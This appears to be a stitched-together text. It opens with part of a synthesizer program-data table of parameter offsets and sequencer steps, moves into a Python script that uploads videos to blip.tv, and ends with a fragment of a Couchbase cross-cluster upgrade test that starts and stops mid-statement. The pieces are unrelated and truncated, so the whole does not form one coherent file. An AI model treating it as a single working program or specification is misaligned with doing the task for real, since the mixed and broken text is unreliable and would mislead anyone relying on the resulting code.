| 122 | | 0~139 | MICRO TUNING *note P21 |
+---------+-------+---------+---------------------------------------------+
| 123 | | 0~24 | SCALE KEY 0~24=-12Note~+12Note |
+---------+-------+---------+---------------------------------------------+
| 124 | | 0~100 | PROGRAM TUNING 0~100=-50Cent~+50Cent |
+---------+-------+---------+---------------------------------------------+
| 125 | | 0,1 | LFO KEY SYNC 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 126 | | 0,1 | LFO VOICE SYNC 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 127 | | 0~3 | LFO TARGET OSC *note P22 |
+---------+-------+---------+---------------------------------------------+
| 128 | | 0~127 | CUTOFF VELOCITY |
+---------+-------+---------+---------------------------------------------+
| 129 | | 0~127 | AMP VELOCITY |
+---------+-------+---------+---------------------------------------------+
| 130 | | 0~3 | MULTI OCTAVE 0~3=16',8',4',2' |
+---------+-------+---------+---------------------------------------------+
| 131 | | 0,1 | MULTI ROUTING 0,1=Pre VCF, Post VCF |
+---------+-------+---------+---------------------------------------------+
| 132 | | 0,1 | EG LEGATO 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 133 | | 0,1 | PORTAMENTO MODE 0,1=Auto,On |
+---------+-------+---------+---------------------------------------------+
| 134 | | 0,1 | PORTAMENTO BPM SYNC 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 135 | | 12~132 | PROGRAM LEVEL 12~132=-18dB~+6dB |
+---------+-------+---------+---------------------------------------------+
| 136 | | 0~200 | VPM PARAM1 (Feedback) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 137 | | 0~200 | VPM PARAM2 (Noise Depth) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 138 | | 0~200 | VPM PARAM3 (ShapeModInt) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 139 | | 0~200 | VPM PARAM4 (Mod Attack) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 140 | | 0~200 | VPM PARAM5 (Mod Decay) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 141 | | 0~200 | VPM PARAM6 (ModKeyTrack) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 142 | | | USER PARAM1 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 143 | | | USER PARAM2 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 144 | | | USER PARAM3 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 145 | | | USER PARAM4 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 146 | | | USER PARAM5 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 147 | | | USER PARAM6 *note P23 |
+---------+-------+---------+---------------------------------------------+
| 148 | 0~1 | | USER PARAM5 TYPE *note P24 |
| | 2~3 | | USER PARAM6 TYPE *note P24 |
| | 4~5 | | Reserved |
| | 6~7 | | Reserved |
+---------+-------+---------+---------------------------------------------+
| 149 | 0~1 | | USER PARAM1 TYPE *note P24 |
| | 2~3 | | USER PARAM2 TYPE *note P24 |
| | 4~5 | | USER PARAM3 TYPE *note P24 |
| | 6~7 | | USER PARAM4 TYPE *note P24 |
+---------+-------+---------+---------------------------------------------+
| 150 | | 1~25 | PROGRAM TRANSPOSE -12~+12 Note |
+---------+-------+---------+---------------------------------------------+
| 151 | L:0~7 | 0~1024 | DELAY DRY WET |
| 152 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 153 | L:0~7 | 0~1024 | REVERB DRY WET |
| 154 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 155 | | 0~28 | MIDI AFTER TOUCH ASSIGN *note P19 |
+---------+-------+---------+---------------------------------------------+
| 156~159 | | ASCII | 'PRED' |
+---------+-------+---------+---------------------------------------------+
| 160~161 | | ASCII | 'SQ' *note S1 |
+---------+-------+---------+---------------------------------------------+
| 162 | 0 | 0,1 | Step 1 Active Step Off/On 0,1=Off,On |
| 162 | 1 | 0,1 | Step 2 Active Step Off/On 0,1=Off,On |
| 162 | 2 | 0,1 | Step 3 Active Step Off/On 0,1=Off,On |
| 162 | 3 | 0,1 | Step 4 Active Step Off/On 0,1=Off,On |
| 162 | 4 | 0,1 | Step 5 Active Step Off/On 0,1=Off,On |
| 162 | 5 | 0,1 | Step 6 Active Step Off/On 0,1=Off,On |
| 162 | 6 | 0,1 | Step 7 Active Step Off/On 0,1=Off,On |
| 162 | 7 | 0,1 | Step 8 Active Step Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 163 | 0 | 0,1 | Step 9 Active Step Off/On 0,1=Off,On |
| 163 | 1 | 0,1 | Step 10 Active Step Off/On 0,1=Off,On |
| 163 | 2 | 0,1 | Step 11 Active Step Off/On 0,1=Off,On |
| 163 | 3 | 0,1 | Step 12 Active Step Off/On 0,1=Off,On |
| 163 | 4 | 0,1 | Step 13 Active Step Off/On 0,1=Off,On |
| 163 | 5 | 0,1 | Step 14 Active Step Off/On 0,1=Off,On |
| 163 | 6 | 0,1 | Step 15 Active Step Off/On 0,1=Off,On |
| 163 | 7 | 0,1 | Step 16 Active Step Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 164 | L:0~7 |100~3000 | BPM 100~3000=10.0~300.0 |
| 165 | H:0~3 | | |
+---------+-------+---------+---------------------------------------------+
| 166 | | 1~16 | Step Length |
+---------+-------+---------+---------------------------------------------+
| 167 | | 0~4 | Step Resolution 0~4 = 1/16,1/8,1/4,1/2,1/1 |
+---------+-------+---------+---------------------------------------------+
| 168 | | -75~+75 | Swing |
+---------+-------+---------+---------------------------------------------+
| 169 | | 0~72 | Default Gate Time 0~72=0%~100% |
+---------+-------+---------+---------------------------------------------+
| 170 | 0 | 0,1 | Step 1 Off/On 0,1=Off,On |
| 170 | 1 | 0,1 | Step 2 Off/On 0,1=Off,On |
| 170 | 2 | 0,1 | Step 3 Off/On 0,1=Off,On |
| 170 | 3 | 0,1 | Step 4 Off/On 0,1=Off,On |
| 170 | 4 | 0,1 | Step 5 Off/On 0,1=Off,On |
| 170 | 5 | 0,1 | Step 6 Off/On 0,1=Off,On |
| 170 | 6 | 0,1 | Step 7 Off/On 0,1=Off,On |
| 170 | 7 | 0,1 | Step 8 Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 171 | 0 | 0,1 | Step 9 Off/On 0,1=Off,On |
| 171 | 1 | 0,1 | Step 10 Off/On 0,1=Off,On |
| 171 | 2 | 0,1 | Step 11 Off/On 0,1=Off,On |
| 171 | 3 | 0,1 | Step 12 Off/On 0,1=Off,On |
| 171 | 4 | 0,1 | Step 13 Off/On 0,1=Off,On |
| 171 | 5 | 0,1 | Step 14 Off/On 0,1=Off,On |
| 171 | 6 | 0,1 | Step 15 Off/On 0,1=Off,On |
| 171 | 7 | 0,1 | Step 16 Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 172 | 0 | 0,1 | Step 1 Motion Off/On 0,1=Off,On |
| 172 | 1 | 0,1 | Step 2 Motion Off/On 0,1=Off,On |
| 172 | 2 | 0,1 | Step 3 Motion Off/On 0,1=Off,On |
| 172 | 3 | 0,1 | Step 4 Motion Off/On 0,1=Off,On |
| 172 | 4 | 0,1 | Step 5 Motion Off/On 0,1=Off,On |
| 172 | 5 | 0,1 | Step 6 Motion Off/On 0,1=Off,On |
| 172 | 6 | 0,1 | Step 7 Motion Off/On 0,1=Off,On |
| 172 | 7 | 0,1 | Step 8 Motion Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 173 | 0 | 0,1 | Step 9 Motion Off/On 0,1=Off,On |
| 173 | 1 | 0,1 | Step 10 Motion Off/On 0,1=Off,On |
| 173 | 2 | 0,1 | Step 11 Motion Off/On 0,1=Off,On |
| 173 | 3 | 0,1 | Step 12 Motion Off/On 0,1=Off,On |
| 173 | 4 | 0,1 | Step 13 Motion Off/On 0,1=Off,On |
| 173 | 5 | 0,1 | Step 14 Motion Off/On 0,1=Off,On |
| 173 | 6 | 0,1 | Step 15 Motion Off/On 0,1=Off,On |
| 173 | 7 | 0,1 | Step 16 Motion Off/On 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 174~175 | | | Motion Slot 1 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 176~177 | | | Motion Slot 2 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 178~179 | | | Motion Slot 3 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 180~181 | | | Motion Slot 4 Parameter *note S2 |
+---------+-------+---------+---------------------------------------------+
| 182 | 0 | | | |
<reponame>CarlFK/veyepar
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""@brief Upload videos to blip.tv or update blip.tv posts
This script can be used to post videos to blip.tv, or to upload additional
formats for existing posts, or to change the description of existing posts.
The script uses the blip.tv "REST Upload API". See http://blip.tv/about/api/.
blip.tv uses item IDs to identify videos. For the video at
http://blip.tv/file/123456, the item ID is "123456". The code refers to
this ID as "video_id".
user/password will be prompted for if not passed.
Usage:
@code
blip_uploader.py --help
# Upload new video:
blip_uploader.py -f new_video.mpg -t "My Great Video"
# Upload alternate format to existing post:
blip_uploader.py -v 123456 -f alternate_format.ogg -n 1 -r Web
@endcode
A Blip Episode can be created from just a Title and 1 File - a thumbnail
will be generated and the default license applied.
Everything else is optional:
description, categories, additional formats, nsfw, topics
This script will let you create and update Episodes.
The creation requires a file, the script will create a Title
from the filename. After that all attributes replace the current values.
"""
import optparse
import configparser
import getpass
import http.client, socket
import mimetypes
import os
import datetime,time
import re
import sys
import urllib.request, urllib.error, urllib.parse
import urllib.parse
import xml.etree.ElementTree
import xml.dom.minidom
import xml.sax.saxutils
import json
import cgi
def stot(seconds):
# convert numeric seconds to hh:mm:ss time string
s=seconds
h,s=divmod(s,3600)
m,s=divmod(s,60)
t="%02i:%02i:%02i" % (h,m,s)
return t
class Blip(object):
# BLIP_UPLOAD_URL = "http://blip.tv/file/post"
BLIP_UPLOAD_URL = "http://uploads.blip.tv/file/post"
# While both URLs will currently work, future applications should use uploads.blip.tv.
MULTIPART_BOUNDARY = "-----------$$SomeFancyBoundary$$"
debug=True
def progress(self, current, total):
"""
Hook method for letting the user see upload progress.
"""
pass
def GetMimeType(self, filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def PostMultipart(self, url, fields, files=[]):
"""@brief Send multi-part HTTP POST request
@param url POST URL
@param fields A dict of {field-name: value}
@param files A list of [(field-name, filename)]
@return Status, reason, response (see httplib.HTTPConnection.getresponse())
"""
content_type = 'multipart/form-data; boundary=%s' % self.MULTIPART_BOUNDARY
# lots of code to figure out Content-Length.. and now I see:
# The header Content-Length is automatically set to the correct value.
# http://docs.python.org/library/httplib.html#httplib.HTTPConnection
# gather all the data (except for the actual file) into:
# fieldsdata - string of "field1:value1\nfield2:value2\n..."
# filedatas - list of tuples: [(metadata1, filename1),(m2,f2)...]
# footdata - string, final "\n--file delimiter--\n"
data = []
for field_name, value in fields.items():
data.append('--' + self.MULTIPART_BOUNDARY)
data.append( "Content-type: text/plain; charset=UTF-8" )
data.append('Content-Disposition: form-data; name="%s"' % field_name)
data.append('')
data.append(value.encode("utf-8"))
fieldsdata="\r\n".join(data)
filedatas=[]
for (field_name, filename) in files:
data=['']
data.append('--' + self.MULTIPART_BOUNDARY)
data.append(
'Content-Disposition: form-data; name="%s"; filename="%s"'
% (field_name, filename))
data.append('Content-Type: %s' % self.GetMimeType(filename))
data.append('')
data.append('')
filedatas.append(['\r\n'.join(data),filename])
footdata='\r\n--' + self.MULTIPART_BOUNDARY + '--\r\n'
# sum up the size of the 3 datas, including the file size
datalen = len(fieldsdata)
for filedata, filename in filedatas:
datalen += len(filedata)
datalen += os.stat(filename).st_size
datalen += len(footdata)
# open the connection, send the headers (not part of datas)
host, selector = urlparts = urllib.parse.urlsplit(url)[1:3]
h = http.client.HTTPConnection(host)
h.putrequest("POST", selector)
h.putheader("content-type", content_type)
h.putheader("content-length", datalen)
h.endheaders()
# send the datas
if self.debug: print(fieldsdata.__repr__())
if self.debug: print(fieldsdata)
self.start_time = datetime.datetime.now()
h.send(fieldsdata)
bytes_sent = len(fieldsdata)
for filedata, filename in filedatas:
if self.debug: print("%s (%s)" % (filedata.__repr__(), filename))
if self.debug: print("%s (%s)" % (filedata, filename))
h.send(filedata)
bytes_sent += len(filedata)
f = open(filename,'rb')
block_size=15000
block=f.read(block_size)
while block:
h.send(block)
bytes_sent += len(block)
self.progress(bytes_sent,datalen)
# time.sleep(.06)
block=f.read(block_size)
if self.debug: print(footdata.__repr__())
h.send(footdata)
bytes_sent += len(footdata)
self.progress(bytes_sent,datalen)
response = h.getresponse()
print("\n", response.status, response.reason)
return response
def Upload(self, video_id, username, password, files, meta={}, thumbname=None):
"""@brief Upload to blip.tv
@param video_id Either the item ID of an existing post or None to create
a new Episode.
@param username, password
@param files List of Filenames and Roles of videos to upload
@param meta['foo'] New foo of the post (title, description, etc)
@thumbname New thumbnail filename
@return Response data
"""
fields = {
"post": "1",
"skin": "xmlhttprequest",
"userlogin": username,
"password": password,
"item_type": "file",
}
if video_id: # update existing
fields["id"] = video_id
# add in additional metadata
fields.update(meta)
# extract out the file number and roles
# example:
# files = [ ('','Source','foo.ogg'), ('1','Web','foo.flv') ]
# fields['file_role']='Source'
# fields['file1_role']='Web'
# files= [ ('file','foo.ogg'), ('file1','foo.flv') ]
for no,role,filename in files:
fields["file%s" % no + "_role"] = role
files = [("file%s" % no, filename) for no,role,filename in files]
if thumbname:
files.append(("thumbnail",thumbname))
done=False
while not done:
try:
response = self.PostMultipart(self.BLIP_UPLOAD_URL, fields, files)
done=True
except socket.error as e:
print(e)
# and try again...
"""
r/lib/python2.6/httplib.py", line 759, in send
self.sock.sendall(str)
File "<string>", line 1, in sendall
socket.error: [Errno 104] Connection reset by peer
"""
except http.client.BadStatusLine:
print(e)
# and try again...
"""
File "/usr/lib/python2.6/httplib.py", line 391, in begin
version, status, reason = self._read_status()
File "/usr/lib/python2.6/httplib.py", line 355, in _read_status
raise BadStatusLine(line)
httplib.BadStatusLine
"""
return response
def Get_Licenses(self):
"""
Get the list of licenses blip crrently supports.
"""
url = 'http://www.blip.tv/?section=licenses&cmd=view&skin=api'
xml_code = urllib.request.urlopen(url).read()
return xml_code
def Get_Categories(self):
"""
Get the list of categories blip crrently supports.
"""
url = 'http://www.blip.tv/?section=categories&cmd=view&skin=api'
xml_code = urllib.request.urlopen(url).read()
return xml_code
def Get_VideoMeta(self, video_id):
"""@brief Return information about the video
@param video_id blip.tv item ID
@return xml of all the metadata.
"""
url = 'http://blip.tv/file/%s?skin=rss' % video_id
if self.debug: print(url)
xml_code = urllib.request.urlopen(url).read()
return xml_code
def Get_TextFromDomNode(self, node):
rc = ""
for n in node.childNodes:
if n.nodeType in [node.TEXT_NODE, node.CDATA_SECTION_NODE]:
rc += n.data
return rc
def Parse_VideoMeta(self, video_xml):
"""@brief Return information about the video
@param video_xml xml about an Episode from blip.tv
@return A dictionary with keys:
@a title (string),
@a description (string),
@a link (URL to video as a string),
@a embed_code (HTML <embed> code as a string),
@a embed_id (the part of the <embed> code that's used with the Drupal filter,
e.g., "AbCcKIuEBA"),
@a existing_mime_types (a dict of {mime_type: list_of_file_urls}
containing the URLs that are currently part of the post)
"""
meta={}
rss = xml.dom.minidom.parseString(video_xml)
channel = rss.getElementsByTagName("channel")[0]
item = channel.getElementsByTagName("item")[0]
meta['title'] = self.Get_TextFromDomNode(item.getElementsByTagName("title")[0])
meta['description'] = xml.sax.saxutils.unescape(
self.Get_TextFromDomNode(item.getElementsByTagName("blip:puredescription")[0]))
meta['link'] = self.Get_TextFromDomNode(item.getElementsByTagName("link")[0])
meta['posts_id'] = self.Get_TextFromDomNode(item.getElementsByTagName("blip:posts_id")[0])
meta['embed_code'] = self.Get_TextFromDomNode(item.getElementsByTagName("media:player")[0])
existing_mime_types = {}
contents = []
media_group = item.getElementsByTagName("media:group")[0]
for content in media_group.getElementsByTagName("media:content"):
existing_mime_types.setdefault(content.attributes["type"].value, []).append( content.attributes["url"].value)
contents.append({
'url': content.attributes["url"].value,
'type': content.attributes["type"].value,
'fileSize': content.attributes["fileSize"].value,
'isDefault': content.attributes["isDefault"].value,
'expression': content.attributes["expression"].value,
'role': content.attributes["blip:role"].value,
# 'acodec': content.attributes["blip:acodec"].value,
})
meta['existing_mime_types']=existing_mime_types
meta['contents']=contents
return meta
def Get_MoreMeta(self, user_id, user_name, password, mystery_id):
# http://blip.tv/dashboard/episode_detailed/4840010?users_id=613931&userlogin=veyepar_test&password=<PASSWORD>&skin=json
url = "http://blip.tv/dashboard/episode_detailed/%(mystery_id)s?users_id=%(users_id)s&userlogin=%(user_name)s&password=%(password)s&skin=json" % { 'mystery_id':mystery_id,
'users_id':user_id, 'user_name':user_name, 'password':password }
if self.debug: print(url)
json_like_data = urllib.request.urlopen(url).read()
json_data = json_like_data[len('blip_ws_results('):-3]
return json_data
def Parse_MoreMeta(self, file_meta):
# [{"posts":[{"categoryId":"7"
# [u'conversions', u'languageCode', u'playlists', u'itemType', u'revenue', u'userId', u'blogUrl', u'licenseId', u'nsfw', u'licenseUrl', u'midrollStart', u'datestamp', u'thumbnailUrl', u'adsEnabled', u'display_name', u'additionalLicense', u'title', u'media', u'tags', u'contentRating', u'nextHiddenDate', u'midrollDuration', u'embedUrl', u'categoryId', u'description', u'views', u'thumbnail120Url', u'hidden', u'adminTitle', u'postsGuid', u'languageName', u'hiddenPassword', u'numMidrolls', u'itemId', u'datestampText', u'categoryName', u'mediaUrl', u'url', u'thumbnailFilename', u'licenseTitle', u'adOptOut', u'postsId', u'additionalMedia', u'login', u'embedLookup', u'showName']
j = json.loads(file_meta)
return j[0]
class Blip_CLI(Blip):
"""
Demonstates use of the Blip class as a Command Line Interface.
"""
| |
self.dest_init])
prev_initial_version = self.initial_version
self.initial_version = self.upgrade_versions[0]
self._install(self.servers[self.src_init + self.dest_init:])
self.create_buckets()
self._join_all_clusters()
if float(prev_initial_version[:2]) < 3.0:
self.pause_xdcr_cluster = None
bucket_default = self.src_cluster.get_bucket_by_name('default')
bucket_sasl = self.src_cluster.get_bucket_by_name('sasl_bucket_1')
bucket_standard = self.dest_cluster.get_bucket_by_name('standard_bucket_1')
bucket_sasl_2 = self.dest_cluster.get_bucket_by_name('sasl_bucket_1')
gen_create2 = BlobGenerator('loadTwo', 'loadTwo-', self._value_size, end=self.num_items)
gen_delete2 = BlobGenerator('loadTwo', 'loadTwo-', self._value_size,
start=int((self.num_items) * (float)(100 - self._perc_del) / 100), end=self.num_items)
gen_update2 = BlobGenerator('loadTwo', 'loadTwo-', self._value_size, start=0,
end=int(self.num_items * (float)(self._perc_upd) / 100))
self._load_bucket(bucket_default, self.src_master, self.gen_create, 'create', exp=0)
self._load_bucket(bucket_sasl, self.src_master, self.gen_create, 'create', exp=0)
if self.pause_xdcr_cluster:
for cluster in self.get_cb_clusters():
for remote_cluster in cluster.get_remote_clusters():
remote_cluster.pause_all_replications()
self._online_upgrade(self.src_nodes, self.servers[self.src_init + self.dest_init:])
self.src_master = self.servers[self.src_init + self.dest_init]
if not self.is_goxdcr_migration_successful(self.src_master):
self.fail("C1: Metadata migration failed after old nodes were removed")
if self.upgrade_versions[0][:3] >= 5.0:
# Add built-in user to C1
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.src_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.src_master),
'builtin')
self._load_bucket(bucket_standard, self.dest_master, self.gen_create, 'create', exp=0)
self._load_bucket(bucket_default, self.src_master, self.gen_update, 'create', exp=self._expires)
self._load_bucket(bucket_sasl, self.src_master, self.gen_update, 'create', exp=self._expires)
self._install(self.src_nodes)
self._online_upgrade(self.servers[self.src_init + self.dest_init:], self.src_nodes, False)
self._load_bucket(bucket_sasl_2, self.dest_master, gen_create2, 'create', exp=0)
self.src_master = self.servers[0]
self.log.info("###### Upgrading C1: completed ######")
self._install(self.servers[self.src_init + self.dest_init:])
self.sleep(60)
self._online_upgrade(self.dest_nodes, self.servers[self.src_init + self.dest_init:])
self.dest_master = self.servers[self.src_init + self.dest_init]
if not self.is_goxdcr_migration_successful(self.dest_master):
self.fail("C2: Metadata migration failed after old nodes were removed")
self._install(self.dest_nodes)
self.sleep(60)
if float(self.initial_version[:2]) >= 3.0 and self._demand_encryption:
if not self.is_ssl_over_memcached(self.src_master):
self.log.info("C1: After old nodes were replaced, C1 still uses "
"proxy connection to C2 which is >= 3.0")
if not self.is_ssl_over_memcached(self.dest_master):
self.log.info("C2: After old nodes were replaced, C2 still uses "
"proxy connection to C1 which is >= 3.0")
self._online_upgrade(self.servers[self.src_init + self.dest_init:], self.dest_nodes, False)
self.dest_master = self.servers[self.src_init]
if self.upgrade_versions[0][:3] >= 5.0:
# Add built-in user to C2
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.dest_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.dest_master),
'builtin')
self.log.info("###### Upgrading C2: completed ######")
if self.pause_xdcr_cluster:
for cluster in self.get_cb_clusters():
for remote_cluster in cluster.get_remote_clusters():
remote_cluster.resume_all_replications()
self._load_bucket(bucket_default, self.src_master, self.gen_delete, 'delete', exp=0)
self._load_bucket(bucket_sasl, self.src_master, self.gen_delete, 'delete', exp=0)
self._load_bucket(bucket_standard, self.dest_master, self.gen_delete, 'delete', exp=0)
self._load_bucket(bucket_sasl_2, self.dest_master, gen_delete2, 'delete', exp=0)
self._wait_for_replication_to_catchup(timeout=600)
self._post_upgrade_ops()
self.sleep(120)
self.verify_results()
self.max_verify = None
if self.ddocs_src:
for bucket_name in self.buckets_on_src:
bucket = self.src_cluster.get_bucket_by_name(bucket_name)
expected_rows = sum([len(kv_store) for kv_store in bucket.kvs.values()])
self._verify_ddocs(expected_rows, [bucket_name], self.ddocs_src, self.src_master)
if self.ddocs_dest:
for bucket_name in self.buckets_on_dest:
bucket = self.dest_cluster.get_bucket_by_name(bucket_name)
expected_rows = sum([len(kv_store) for kv_store in bucket.kvs.values()])
self._verify_ddocs(expected_rows, [bucket_name], self.ddocs_dest, self.dest_master)
if float(self.upgrade_versions[0][:3]) == 4.6:
self.log.info("##### Testing LWW as we are upgrading to 4.6 #####")
src_conn = RestConnection(self.src_master)
dest_conn = RestConnection(self.dest_master)
src_conn.delete_bucket(bucket='default')
dest_conn.delete_bucket(bucket='default')
src_conn.create_bucket(bucket='lww', ramQuotaMB=100, authType='none', saslPassword='', replicaNumber=1,
proxyPort=STANDARD_BUCKET_PORT + 1, bucketType='membase', replica_index=1, threadsNumber=3,
flushEnabled=1, lww=True)
dest_conn.create_bucket(bucket='lww', ramQuotaMB=100, authType='none', saslPassword='', replicaNumber=1,
proxyPort=STANDARD_BUCKET_PORT + 1, bucketType='membase', replica_index=1, threadsNumber=3,
flushEnabled=1, lww=True)
self.assertTrue(src_conn.is_lww_enabled(bucket='lww'), "LWW not enabled on source bucket")
self.log.info("LWW enabled on source bucket as expected")
self.assertTrue(dest_conn.is_lww_enabled(bucket='lww'), "LWW not enabled on dest bucket")
self.log.info("LWW enabled on dest bucket as expected")
if float(self.initial_version[:3]) == 3.1 and float(self.upgrade_versions[0][:3]) == 4.1:
goxdcr_log = NodeHelper.get_goxdcr_log_dir(self._input.servers[0])\
+ '/goxdcr.log*'
for node in self.src_cluster.get_nodes():
count1 = NodeHelper.check_goxdcr_log(
node,
"Received error response from memcached in target cluster",
goxdcr_log)
count2 = NodeHelper.check_goxdcr_log(
node,
"EINVAL",
goxdcr_log)
count3 = NodeHelper.check_goxdcr_log(
node,
"Failed to repair connections to target cluster",
goxdcr_log)
count4 = NodeHelper.check_goxdcr_log(
node,
"received error response from setMeta client. Repairing connection. response status=EINVAL",
goxdcr_log)
count5 = NodeHelper.check_goxdcr_log(
node,
"GOGC in new global setting is 0, which is not a valid value and can only have come from "
"upgrade. Changed it to 100 instead.",
goxdcr_log)
if count1 > 0 or count2 > 0:
self.assertEqual(count3, 0, "Failed to repair connections to target cluster "
"error message found in " + str(node.ip))
self.log.info("Failed to repair connections to target cluster "
"error message not found as expected in " + str(node.ip))
self.assertEqual(count4, 0, "Disconnect errors found in " + str(node.ip))
self.assertEqual(count5, 0, "GOGC reset to 0 during upgrade in " + str(node.ip))
def incremental_offline_upgrade(self):
if self.bucket_type == "ephemeral" and float(self.initial_version[:3]) < 5.0:
self.log.info("Ephemeral buckets not available in version " + str(self.initial_version))
self.skip_this_version = True
return
if self.initial_version[:3] >= self.upgrade_versions[0][:3]:
self.log.info("Initial version greater than upgrade version - not supported")
self.skip_this_version = True
return
upgrade_seq = self.input.param("upgrade_seq", "src>dest")
self._install(self.servers[:self.src_init + self.dest_init ])
self.create_buckets()
self._join_all_clusters()
self.sleep(60)
bucket = self.src_cluster.get_bucket_by_name('default')
self._load_bucket(bucket, self.src_master, self.gen_create, 'create', exp=0)
bucket = self.src_cluster.get_bucket_by_name('sasl_bucket_1')
self._load_bucket(bucket, self.src_master, self.gen_create, 'create', exp=0)
bucket = self.dest_cluster.get_bucket_by_name('sasl_bucket_1')
gen_create2 = BlobGenerator('loadTwo', 'loadTwo', self._value_size, end=self.num_items)
self._load_bucket(bucket, self.dest_master, gen_create2, 'create', exp=0)
self.sleep(self.wait_timeout)
self._wait_for_replication_to_catchup()
nodes_to_upgrade = []
if upgrade_seq == "src>dest":
nodes_to_upgrade = copy.copy(self.src_nodes)
nodes_to_upgrade.extend(self.dest_nodes)
elif upgrade_seq == "src<dest":
nodes_to_upgrade = copy.copy(self.dest_nodes)
nodes_to_upgrade.extend(self.src_nodes)
elif upgrade_seq == "src><dest":
min_cluster = min(len(self.src_nodes), len(self.dest_nodes))
for i in xrange(min_cluster):
nodes_to_upgrade.append(self.src_nodes[i])
nodes_to_upgrade.append(self.dest_nodes[i])
for _seq, node in enumerate(nodes_to_upgrade):
self._offline_upgrade([node])
self.sleep(60)
if self.upgrade_versions[0][:3] >= 5.0:
# Add built-in user to C1
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.src_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.src_master),
'builtin')
# Add built-in user to C2
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.dest_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.dest_master),
'builtin')
bucket = self.src_cluster.get_bucket_by_name('sasl_bucket_1')
itemPrefix = "loadThree" + _seq * 'a'
gen_create3 = BlobGenerator(itemPrefix, itemPrefix, self._value_size, end=self.num_items)
self._load_bucket(bucket, self.src_master, gen_create3, 'create', exp=0)
bucket = self.src_cluster.get_bucket_by_name('default')
itemPrefix = "loadFour" + _seq * 'a'
gen_create4 = BlobGenerator(itemPrefix, itemPrefix, self._value_size, end=self.num_items)
self._load_bucket(bucket, self.src_master, gen_create4, 'create', exp=0)
self._wait_for_replication_to_catchup(timeout=600)
self.merge_all_buckets()
self.verify_results()
self.sleep(self.wait_timeout * 5, "Let clusters work for some time")
if float(self.initial_version[:3]) == 3.1 and float(self.upgrade_versions[0][:3]) == 4.1:
goxdcr_log = NodeHelper.get_goxdcr_log_dir(self._input.servers[0])\
+ '/goxdcr.log*'
for node in self.src_cluster.get_nodes():
count1 = NodeHelper.check_goxdcr_log(
node,
"Received error response from memcached in target cluster",
goxdcr_log)
count2 = NodeHelper.check_goxdcr_log(
node,
"EINVAL",
goxdcr_log)
count3 = NodeHelper.check_goxdcr_log(
node,
"Failed to repair connections to target cluster",
goxdcr_log)
count4 = NodeHelper.check_goxdcr_log(
node,
"received error response from setMeta client. Repairing connection. response status=EINVAL",
goxdcr_log)
count5 = NodeHelper.check_goxdcr_log(
node,
"GOGC in new global setting is 0, which is not a valid value and can only have come from "
"upgrade. Changed it to 100 instead.",
goxdcr_log)
if count1 > 0 or count2 > 0:
self.assertEqual(count3, 0, "Failed to repair connections to target cluster "
"error message found in " + str(node.ip))
self.log.info("Failed to repair connections to target cluster "
